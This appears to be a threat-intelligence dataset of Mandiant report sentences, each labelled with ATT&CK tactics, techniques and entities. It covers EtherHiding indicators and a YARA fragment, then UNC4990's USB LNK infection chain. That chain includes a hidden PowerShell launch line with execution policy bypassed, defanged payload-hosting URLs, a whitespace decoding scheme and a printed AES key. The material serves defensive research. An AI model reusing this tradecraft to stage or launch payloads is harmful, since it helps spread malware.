{ "uid": "mandiant-32_mandiant_report-p16-s107-4c871d", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 107, "context_before": "Managed Updates: Administrators use Chrome Enterprise to control and automate browser updates.", "sentence_text": "Updates are pushed silently and automatically in the background.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s108-be0aba", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 108, "context_before": "Updates are pushed silently and automatically in the background.", "sentence_text": "Any prompt to do so is considered a scam and thus undermines the primary social engineering tactic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s109-951d1e", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 109, "context_before": "Any prompt to do so is considered a scam and thus undermines the primary social engineering tactic.", "sentence_text": "3. Control Web Access and Scripts While attackers constantly change their infrastructure, policies can still reduce the initial attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s110-33679c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 110, "context_before": "3. Control Web Access and Scripts While attackers constantly change their infrastructure, policies can still reduce the initial attack surface.", "sentence_text": "Safe Browsing: Policies can enforce Google's Safe Browsing in its most enhanced mode, which uses real- time threat intelligence to warn users about phishing sites and malicious downloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s111-5c0797", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 111, "context_before": "Safe Browsing: Policies can enforce Google's Safe Browsing in its most enhanced mode, which uses real- time threat intelligence to warn users about phishing sites and malicious downloads.", "sentence_text": "Acknowledgements\nThis analysis would not have been possible without the assistance from across Google Threat Intelligence Group,", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p17-s112-90e6c2", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 17, "sentence_id": 112, "context_before": "Acknowledgements\nThis analysis would not have been possible without the assistance from across Google Threat Intelligence Group,", "sentence_text": "Indicators of Compromise Type Indicator SHA256 Hash (ZIP Archive) 970307708071c01d32 SHA256 Hash (Initial 01fd153bfb4be440dd JavaScript Downloader)\nBSC Address (Smart Contract) 0x8eac3198dd72f3e0 BSC Address (Attacker- 0x9bc1355344b54ded", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p17-s113-156e09", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 17, "sentence_id": 113, "context_before": "Indicators of Compromise Type Indicator SHA256 Hash (ZIP Archive) 970307708071c01d32 SHA256 Hash (Initial 01fd153bfb4be440dd JavaScript Downloader)\nBSC Address (Smart Contract) 0x8eac3198dd72f3e0 BSC Address (Attacker- 0x9bc1355344b54ded", "sentence_text": "Controlled)\nEthereum Transaction Hash (INVISIBLEFERRET.JAVASCRIPT 0x86d1a21fd151e344 Payload)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p17-s114-fefede", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 17, "sentence_id": 114, "context_before": "Controlled)\nEthereum Transaction Hash (INVISIBLEFERRET.JAVASCRIPT 0x86d1a21fd151e344 Payload)", "sentence_text": "Ethereum Transaction Hash (INVISIBLEFERRET.JAVASCRIPT 0xc2da361c40279a4f Split Payload)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p18-s115-2dced3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 18, "sentence_id": 115, "context_before": "Ethereum Transaction Hash (INVISIBLEFERRET.JAVASCRIPT 0xc2da361c40279a4f Split Payload)", "sentence_text": "Google Cloud Blog CloudType Blog IndicatorContact sales Get started for free Ethereum Transaction Hash (INVISIBLEFERRET Credential 0xf9d432745ea15dbc Stealer Payload)\nYARA Detections\nrule G_Downloader_JADESNOW_1 { meta:\nauthor = \"Google Threat Intellige strings:\n$s1 = \"global['_V']\" $s2 = \"global['r']\" $s3 = \"umP\" $s4 = \"mergeConfig\" $s5 = \"charAt\" nocase condition:\nuint16(0) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p18-s116-2e816c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 18, "sentence_id": 116, "context_before": "Google Cloud Blog CloudType Blog IndicatorContact sales Get started for free Ethereum Transaction Hash (INVISIBLEFERRET Credential 0xf9d432745ea15dbc Stealer Payload)\nYARA Detections\nrule G_Downloader_JADESNOW_1 { meta:\nauthor = \"Google Threat Intellige strings:\n$s1 = \"global['_V']\" $s2 = \"global['r']\" $s3 = \"umP\" $s4 = \"mergeConfig\" $s5 = \"charAt\" nocase condition:\nuint16(0) !", "sentence_text": "= 0x5A4D and filesize } Posted in Threat Intelligence Related articles", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p19-s117-44d196", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 19, "sentence_id": 117, "context_before": "= 0x5A4D and filesize } Posted in Threat Intelligence Related articles", "sentence_text": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog GTIG AI Threat Tracker: Advances in Preparing for Threats to Come:\nThreat Actor Usage of AI Tools Cybersecurity Forecast 2026", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p19-s118-fe1568", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 19, "sentence_id": 118, "context_before": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog GTIG AI Threat Tracker: Advances in Preparing for Threats to Come:\nThreat Actor Usage of AI Tools Cybersecurity Forecast 2026", "sentence_text": "By Google Threat Intelligence Group • 30-minute read By Adam Greenberg • 4-minute read Threat Intelligence Threat Intelligence Keys to the Kingdom: A Defender's Help Wanted: Vietnamese Actors Guide to Privileged Account Using Fake Job Posting Campaigns to Monitoring Deliver Malware and Steal Credentials By Mandiant • 39-minute read By Google Threat Intelligence Group • 6-minute read Follow us", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p19-s119-a37c7c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 19, "sentence_id": 119, "context_before": "By Google Threat Intelligence Group • 30-minute read By Adam Greenberg • 4-minute read Threat Intelligence Threat Intelligence Keys to the Kingdom: A Defender's Help Wanted: Vietnamese Actors Guide to Privileged Account Using Fake Job Posting Campaigns to Monitoring Deliver Malware and Steal Credentials By Mandiant • 39-minute read By Google Threat Intelligence Group • 6-minute read Follow us", "sentence_text": "Google Cloud Google Cloud Products Privacy Terms Help English", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s1-3dd22f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "UNC4990 primarily targets users based in Italy and is likely motivated by financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s2-c1717a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "UNC4990 primarily targets users based in Italy and is likely motivated by financial gain.", "sentence_text": "Our research shows this campaign has been ongoing since at least 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s3-1535cf", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Our research shows this campaign has been ongoing since at least 2020.", "sentence_text": "The legitimate services abused by UNC4990 (including Ars Technica, GitHub, GitLab, and Vimeo) didn’t involve exploiting any known or unknown vulnerabilities in these sites, nor did any of these organizations have anything misconfigured to allow for this abuse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s4-dc1853", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "The legitimate services abused by UNC4990 (including Ars Technica, GitHub, GitLab, and Vimeo) didn’t involve exploiting any known or unknown vulnerabilities in these sites, nor did any of these organizations have anything misconfigured to allow for this abuse.", "sentence_text": "Anyone who may have inadvertently clicked or viewed this content in the past was not at risk of being compromised.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s5-162dc2", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "Anyone who may have inadvertently clicked or viewed this content in the past was not at risk of being compromised.", "sentence_text": "VETTA Loader\nand\nBrokerLoader\n), a downloader that can execute any payload served by the command and control (C2) server, and QUIETBOARD, which is a backdoor that was delivered using EMPTYSPACE.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute payloads delivered from a command and control server and deliver a backdoor using a downloader.", "entities": [ { "text": "VETTA Loader", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "BrokerLoader", "start": 17, "end": 29, "label": "MalwareTool" }, { "text": "QUIETBOARD", "start": 126, "end": 136, "label": "MalwareTool" }, { "text": "EMPTYSPACE", "start": 183, "end": 193, "label": "MalwareTool" }, { "text": "execute any payload served by the command and control (C2) server", "start": 55, "end": 120, "label": "Action" }, { "text": "was delivered using EMPTYSPACE", "start": 163, "end": 193, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s6-b97404", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "VETTA Loader\nand\nBrokerLoader\n), a downloader that can execute any payload served by the command and control (C2) server, and QUIETBOARD, which is a backdoor that was delivered using EMPTYSPACE.", "sentence_text": "Infection Lifecycle\nInitial Compromise: USB LNK In all instances of the infection which responded to, the infection began with the victim double-clicking a malicious LNK shortcut file on a removable USB device.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1091", "name": "Replication Through Removable Media" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "Deliver malicious LNK file via USB and trigger execution when the victim double-clicks it.", "entities": [ { "text": "double-clicking a malicious LNK shortcut file on a removable USB device", "start": 138, "end": 209, "label": "Action" }, { "text": "removable USB device", "start": 189, "end": 209, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s7-7976ae", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "Infection Lifecycle\nInitial Compromise: USB LNK In all instances of the infection which responded to, the infection began with the victim double-clicking a malicious LNK shortcut file on a removable USB device.", "sentence_text": "The naming convention for the LNK file typically consisted of the vendor of the USB device and the storage size in brackets, for example:\nKINGSTON (32GB).lnk\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s8-11066c", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "The naming convention for the LNK file typically consisted of the vendor of the USB device and the storage size in brackets, for example:\nKINGSTON (32GB).lnk\n.", "sentence_text": "This was likely done to entice unsuspecting users to double click the file, ultimately triggering the functionality embedded in the LNK file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s9-3b0533", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "This was likely done to entice unsuspecting users to double click the file, ultimately triggering the functionality embedded in the LNK file.", "sentence_text": "Upon double clicking, the PowerShell script explorer.ps1 is executed via the following LNK shortcut target:\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle\nhidden -NoProfile -nologo -ExecutionPolicy", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Execute a PowerShell script via an LNK shortcut upon user interaction.", "entities": [ { "text": "PowerShell script explorer.ps1", "start": 26, "end": 56, "label": "MalwareTool" }, { "text": "is executed via the following LNK shortcut target", "start": 57, "end": 106, "label": "Action" }, { "text": "C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "start": 108, "end": 165, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s10-b342d7", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "Upon double clicking, the PowerShell script explorer.ps1 is executed via the following LNK shortcut target:\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle\nhidden -NoProfile -nologo -ExecutionPolicy", "sentence_text": "ByPass -File explorer.ps1 Explorer.ps1 From the investigations conducted by , Mandiant identified multiple iterations of a malicious PowerShell script called explorer.ps1 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s11-c88e7f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "ByPass -File explorer.ps1 Explorer.ps1 From the investigations conducted by , Mandiant identified multiple iterations of a malicious PowerShell script called explorer.ps1 .", "sentence_text": "The earliest version of explorer.ps1 which we identified ( SHA256: 72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be ) checks whether a Hangul Filler Unicode character ( E3 85 A4 in UTF-8) labeled directory exists at the current path and only continues with the execution of the following sequence in the case the condition is true ( Hangul Filler is a special Unicode character (U+3164) used in the Korean writing system, Hangul.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s12-3334a9", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "The earliest version of explorer.ps1 which we identified ( SHA256: 72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be ) checks whether a Hangul Filler Unicode character ( E3 85 A4 in UTF-8) labeled directory exists at the current path and only continues with the execution of the following sequence in the case the condition is true ( Hangul Filler is a special Unicode character (U+3164) used in the Korean writing system, Hangul.", "sentence_text": "It is typically not possible to use a whitespace as a file or directory name in Windows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s13-befca9", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "It is typically not possible to use a whitespace as a file or directory name in Windows.", "sentence_text": "However, using the Hangul Filler character, which is rendered as a whitespace, this restriction can be bypassed ):", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s14-0e29b0", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "However, using the Hangul Filler character, which is rendered as a whitespace, this restriction can be bypassed ):", "sentence_text": "Triggers the default action associated with the item pointed to by Hangul Filler named directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s15-bb1f0a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Triggers the default action associated with the item pointed to by Hangul Filler named directory.", "sentence_text": "Some newer instances of the script contain a unique UUID value, different for each infection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s16-384249", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Some newer instances of the script contain a unique UUID value, different for each infection.", "sentence_text": "The identifier is saved to a file named from_machine_uuid.dat in the APPDATA directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s17-a8b4fc", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "The identifier is saved to a file named from_machine_uuid.dat in the APPDATA directory.", "sentence_text": "The script fetches a resource from a URL stored in the script, hxxps://lucaespo.altervista[.]org/updater.php?from=USB1 , and saves it as Runtime Broker.exe a.k.a. EMPTYSPACE in the TEMP directory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Fetch payload from remote URL and save it as a disguised executable in the TEMP directory.", "entities": [ { "text": "fetches a resource from a URL stored in the script", "start": 11, "end": 61, "label": "Action" }, { "text": "hxxps://lucaespo.altervista[.]org/updater.php?from=USB1", "start": 63, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "saves it as Runtime Broker.exe a.k.a. EMPTYSPACE in the TEMP directory", "start": 125, "end": 195, "label": "Action" }, { "text": "Runtime Broker.exe", "start": 137, "end": 155, "label": "MalwareTool" }, { "text": "EMPTYSPACE", "start": 163, "end": 173, "label": "MalwareTool" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s18-dce2d9", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "The script fetches a resource from a URL stored in the script, hxxps://lucaespo.altervista[.]org/updater.php?from=USB1 , and saves it as Runtime Broker.exe a.k.a. EMPTYSPACE in the TEMP directory.", "sentence_text": "In later versions (such as SHA256: 99d9dfd8f1c11d055e515a02c1476bd9036c788493063f08b82bb5f34e19dfd6 ), the script was updated with an intermediary stage hosted at the URL:\nhxxps://eldi8.github[.]io/src.txt\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s19-6c0d2f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "In later versions (such as SHA256: 99d9dfd8f1c11d055e515a02c1476bd9036c788493063f08b82bb5f34e19dfd6 ), the script was updated with an intermediary stage hosted at the URL:\nhxxps://eldi8.github[.]io/src.txt\n.", "sentence_text": "The\nsrc.txt\n(\nSHA256: b38dbaea648ef7da1c639f4fdaac0d88f03306ea42f0edc9af512c613dbdb7e1\n) file contains a pattern of three characters: TAB:\n, Space:\nand Line Feed:\n0A\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s20-7183dc", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "The\nsrc.txt\n(\nSHA256: b38dbaea648ef7da1c639f4fdaac0d88f03306ea42f0edc9af512c613dbdb7e1\n) file contains a pattern of three characters: TAB:\n, Space:\nand Line Feed:\n0A\n.", "sentence_text": "In a traditional text editor, src.txt would appear as a blank file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s21-cbfa92", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "In a traditional text editor, src.txt would appear as a blank file.", "sentence_text": "Mandiant observed the same src.txt had been previously hosted on GitLab:\nhxxps://evh001.gitlab[.]io/src.txt\ncustom decoding scheme is then applied to the src.txt file, consisting of the following sequence of operations:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Apply custom decoding scheme to obfuscated file retrieved from remote hosting.", "entities": [ { "text": "custom decoding scheme is then applied to the src.txt file", "start": 108, "end": 166, "label": "Action" }, { "text": "hxxps://evh001.gitlab[.]io/src.txt", "start": 73, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s22-3af654", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Mandiant observed the same src.txt had been previously hosted on GitLab:\nhxxps://evh001.gitlab[.]io/src.txt\ncustom decoding scheme is then applied to the src.txt file, consisting of the following sequence of operations:", "sentence_text": "Character replacement\nSpaces are replaced with 1s Tab characters are replaced with 0s New line characters are replaced with spaces This transformation changes the original string into a new format that resembles a binary string (composed of 1s and 0s).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s23-19a805", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "Character replacement\nSpaces are replaced with 1s Tab characters are replaced with 0s New line characters are replaced with spaces This transformation changes the original string into a new format that resembles a binary string (composed of 1s and 0s).", "sentence_text": "The transformed string is then split into an array of substrings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s24-958e0a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "The transformed string is then split into an array of substrings.", "sentence_text": "Each substring represents a sequence of 1s and 0s.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s25-360942", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Each substring represents a sequence of 1s and 0s.", "sentence_text": "Each substring is converted from a binary representation to its corresponding character.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s26-064192", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "Each substring is converted from a binary representation to its corresponding character.", "sentence_text": "The resulting characters are joined back together into a single string.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s27-6c28f3", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "The resulting characters are joined back together into a single string.", "sentence_text": "The newly constructed string is the final URL from where the executable Runtime Broker.exe is downloaded:\nhxxps://wjecpujpanmwm[.]tk/updater.php?from=USB1\n.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download executable Runtime Broker.exe from a remote URL.", "entities": [ { "text": "is downloaded", "start": 91, "end": 104, "label": "Action" }, { "text": "Runtime Broker.exe", "start": 72, "end": 90, "label": "MalwareTool" }, { "text": "hxxps://wjecpujpanmwm[.]tk/updater.php?from=USB1", "start": 106, "end": 154, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s28-d92419", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "The newly constructed string is the final URL from where the executable Runtime Broker.exe is downloaded:\nhxxps://wjecpujpanmwm[.]tk/updater.php?from=USB1\n.", "sentence_text": "This URL was serving EMPTYSPACE from at least early 2022 through to July 2023, as Mandiant has also observed it in updated versions of explorer.ps1 Once EMPTYSPACE has been downloaded, the script continuously checks for the existence of the file pythonw.exe , under the directory %ProgramFiles%\\Winsoft Update Service\\ and will proceed to execute the newly downloaded malware every second only if the pythonw.exe file is not present at the specified path.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Check for presence of pythonw.exe and execute downloaded malware repeatedly if not present.", "entities": [ { "text": "EMPTYSPACE", "start": 21, "end": 31, "label": "MalwareTool" }, { "text": "checks for the existence of the file pythonw.exe", "start": 209, "end": 257, "label": "Action" }, { "text": "will proceed to execute the newly downloaded malware every second only if the pythonw.exe file is not present", "start": 323, "end": 432, "label": "Action" }, { "text": "pythonw.exe", "start": 246, "end": 257, "label": "Infrastructure_Indicator" }, { "text": "%ProgramFiles%\\Winsoft Update Service\\", "start": 280, "end": 318, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s29-e8fd5f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "This URL was serving EMPTYSPACE from at least early 2022 through to July 2023, as Mandiant has also observed it in updated versions of explorer.ps1 Once EMPTYSPACE has been downloaded, the script continuously checks for the existence of the file pythonw.exe , under the directory %ProgramFiles%\\Winsoft Update Service\\ and will proceed to execute the newly downloaded malware every second only if the pythonw.exe file is not present at the specified path.", "sentence_text": "Use of Third-Party Websites for Payload Hosting Starting in 2023, the use of GitHub was replaced by a new payload hosted on Vimeo, a video sharing website, with the new URL being also hard-coded in explorer.ps1 as hxxps://vimeo[.]com/api/v2/video/804838895.json .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Host payload on a third-party web service and embed its URL in script.", "entities": [ { "text": "hosted on Vimeo", "start": 114, "end": 129, "label": "Action" }, { "text": "hard-coded in explorer.ps1", "start": 184, "end": 210, "label": "Action" }, { "text": "hxxps://vimeo[.]com/api/v2/video/804838895.json", "start": 214, "end": 261, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s30-57fba1", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "Use of Third-Party Websites for Payload Hosting Starting in 2023, the use of GitHub was replaced by a new payload hosted on Vimeo, a video sharing website, with the new URL being also hard-coded in explorer.ps1 as hxxps://vimeo[.]com/api/v2/video/804838895.json .", "sentence_text": "The encoded payload was inserted into the description of a Pink Floyd-related video uploaded to Vimeo on March 5, 2023.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Insert encoded payload into video description on a web service.", "entities": [ { "text": "was inserted into the description of a Pink Floyd-related video", "start": 20, "end": 83, "label": "Action" }, { "text": "Vimeo", "start": 96, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s31-91d459", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "The encoded payload was inserted into the description of a Pink Floyd-related video uploaded to Vimeo on March 5, 2023.", "sentence_text": "At the time of publishing this post, the video was removed from Vimeo.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s32-4b94f3", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "At the time of publishing this post, the video was removed from Vimeo.", "sentence_text": "This change from the previously discussed version has been coupled with an upgrade from the custom decoding scheme to the use of AES in CBC mode and Base64 encoding.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s33-c1c2a9", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "This change from the previously discussed version has been coupled with an upgrade from the custom decoding scheme to the use of AES in CBC mode and Base64 encoding.", "sentence_text": "The script fetches the Vimeo JSON blob which contains the attacker payload between the delimiter characters ::??\nand\n?:?:\n.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102.001", "name": "Dead Drop Resolver" } ], "procedure": "Fetch payload embedded in Vimeo JSON content using delimiter markers.", "entities": [ { "text": "fetches the Vimeo JSON blob which contains the attacker payload", "start": 11, "end": 74, "label": "Action" }, { "text": "Vimeo", "start": 23, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s34-977538", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "The script fetches the Vimeo JSON blob which contains the attacker payload between the delimiter characters ::??\nand\n?:?:\n.", "sentence_text": "The payload is then Base64 decoded and decrypted with a hard-coded AES-256-CBC key shown as follows:\n92 f7 6b 7d 6a e7 3f 41 b5 8f 41 e5 14 fb 68 de c8 e8 4a 2d c1", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.013", "name": "Obfuscated Files or Information: Encrypted/Encoded File" } ], "procedure": "Decode Base64 payload and decrypt it using a hard-coded AES-256-CBC key.", "entities": [ { "text": "Base64 decoded and decrypted with a hard-coded AES-256-CBC key", "start": 20, "end": 82, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s35-27ea9d", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "The payload is then Base64 decoded and decrypted with a hard-coded AES-256-CBC key shown as follows:\n92 f7 6b 7d 6a e7 3f 41 b5 8f 41 e5 14 fb 68 de c8 e8 4a 2d c1", "sentence_text": "6f a2 71 f3 f3 1d 9f 3c 99 b7 4d From November 27, 2023, observed yet another shift in TTPs with regard to third-party websites used as C2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s36-a73780", "source": "mandiant", "doc_id": "33_mandiant_report", 